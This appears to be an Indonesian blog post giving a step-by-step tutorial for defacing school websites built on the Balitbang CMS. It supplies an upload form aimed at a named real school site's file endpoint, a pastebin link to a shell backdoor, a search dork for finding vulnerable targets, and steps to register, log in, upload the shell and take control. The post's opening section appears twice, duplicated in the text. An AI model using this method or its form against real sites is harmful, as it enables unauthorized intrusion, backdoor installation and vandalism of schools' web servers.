Tutorial Deface Method CSRF Balitbang
Sunday, December 18, 2016
Edit
Helloo... Kembali lagi bersama saya ^.^
Kali ini saya akan share tutorial deface dengan CSRF Balitbang :p
Bahan Bahan :
-CSRF :
</head>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<body>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<center><font face="Iceland"><font size="7" color=Red>Uploader by Eitaro Attacker</font></center>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<center><form enctype="multipart/form-data" action="http://www.smpitmbu-jamanis.sch.id/functions/simmateriguru.php" method="post"></center>
<center><input name="file" type="file"><input type="submit" value="Upload"></center>
Shell Backdoor : http://pastebin.com/HTaZ8KVp
-Email yang masih aktif
-Wajah Tampan :'v :p
Langkah langkah :
Kita cari dulu target dengan dork berikut :
Inurl:/member/daftar.php
Contoh:site.sch.id/member/daftar.php
3.Maka Tampilanya akan seperti ini :
Sampai ketemu lagi...
Kali ini saya akan share tutorial deface dengan CSRF Balitbang :p
Bahan Bahan :
-CSRF :
</head>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<body>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<center><font face="Iceland"><font size="7" color=Red>Uploader by Eitaro Attacker</font></center>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<center><form enctype="multipart/form-data" action="http://www.smpitmbu-jamanis.sch.id/functions/simmateriguru.php" method="post"></center>
<center><input name="file" type="file"><input type="submit" value="Upload"></center>
Shell Backdoor : http://pastebin.com/HTaZ8KVp
-Email yang masih aktif
-Wajah Tampan :'v :p
Langkah langkah :
Kita cari dulu target dengan dork berikut :
Inurl:/member/daftar.php
Contoh:site.sch.id/member/daftar.php
3.Maka Tampilanya akan seperti ini :
4.Lalu isikan kotak yang kosong itu , dan klik daftar/simpan.
5.Setelah kita klik daftar/simpan, maka tampilanya akan seperti ini :
6.Setelah itu buka email kita yang tadi di pake buat daftar
7.Lalu lihat di Kotak Masuk / Spam Dan Klik Validasi Member
8.Setelah kita klik validasi member maka tampilanya akan seperti ini.
9.Lalu klik lanjutkan, dan masukan username password nya
10.Setelah kita masuk , lalu buka CSRF nya (Untuk Upload Shell)
11.Ganti http://fonts.googleapis.com Di Script CSRF nya menjadi web target kalian..
12.Setelah itu kita save dan buka CSRF nya ...
13.Setelah itu tinggal pasang shell backdoor dan klik upload
14.Setelah kita upload maka akan ada bacaan seperti ini :
Anda tidak dapat di perkenankan mengakses fasilitas ini .
Silahkan daftar menjadi member dan login telebih dahulu.,itu tandanya kita berhasil memasang shell backdoor nya:p
15.Tempat akses shell backdoornya : /materi/file.php (Ingat , walaupun shell yang kalian upload bernama ganteng.php atau apalah yang sering kalian pake, maka setelah kita menguploadnya,itu akan berubah menjadi nenek nenek perawan :v .. eh salah maksudnya menjadi file.php)
Tetapi jika kita buka /materi/file.php malah 404 not found / 500 internal server / 403 forbidden
Saya sarangkan mencari target lain :p
16.Setelah shell kalian kebuka, kalian tebas deh mau ngapain aja :D
Oke sekian dan selamat belajar...
